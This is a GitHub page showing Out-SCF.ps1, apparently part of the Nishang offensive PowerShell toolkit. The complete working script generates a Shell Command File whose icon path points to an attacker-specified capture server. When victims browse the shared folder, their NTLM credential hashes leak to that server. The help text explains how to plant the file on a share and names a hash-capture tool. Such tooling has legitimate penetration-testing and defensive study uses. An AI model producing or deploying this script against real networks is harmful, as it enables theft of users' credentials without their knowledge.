-
Notifications
You must be signed in to change notification settings - Fork 2.5k
/
Copy pathOut-SCF.ps1
60 lines (43 loc) · 1.65 KB
/
Out-SCF.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
function Out-SCF
{
<#
.SYNOPSIS
Nishang script useful for creating SCF files which could be used to capture NTLM hashes.
.DESCRIPTION
The script generates a SCF file. The file (default name "SystemCatalog.scf") needs to be
put on a share. Whenever a user opens the file on the share, his credentials are sent to the specifed capture server.
The IP address of the capture server is specifed in the icon field.
There are various good servers to capture hashes in this way, a PowerShell one
is Inveigh (https://github.com/Kevin-Robertson/Inveigh)
The script is based on a blog by Rob Fuller (@mubix)
.PARAMETER IPAddress
IPAddress of the capture server.
.PARAMETER OutputPath
Path to the .scf file to be generated. Default is with the name SystemCatalog.scf in the current directory.
.EXAMPLE
PS > Out-SCF IPAddress 192.168.230.1
Put the generated scf file in a shared folder. When a user opens the share (it is not required to open the scf file),
his NTLM hashes can be captured on the capture server running on the specified IP.
.LINK
https://room362.com/post/2016/smb-http-auth-capture-via-scf
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$IPAddress,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$OutputPath = "$pwd\SystemCatalog.scf"
)
$scf = @"
[Shell]
Command=2
IconFile=\\$IPAddress\share\test.ico
[Taskbar]
Command=ToggleDesktop
"@
Out-File -InputObject $scf -FilePath $OutputPath -Encoding default
Write-Output "SCF file written to $OutputPath"
Write-Output "Put $OutputPath on a share."
}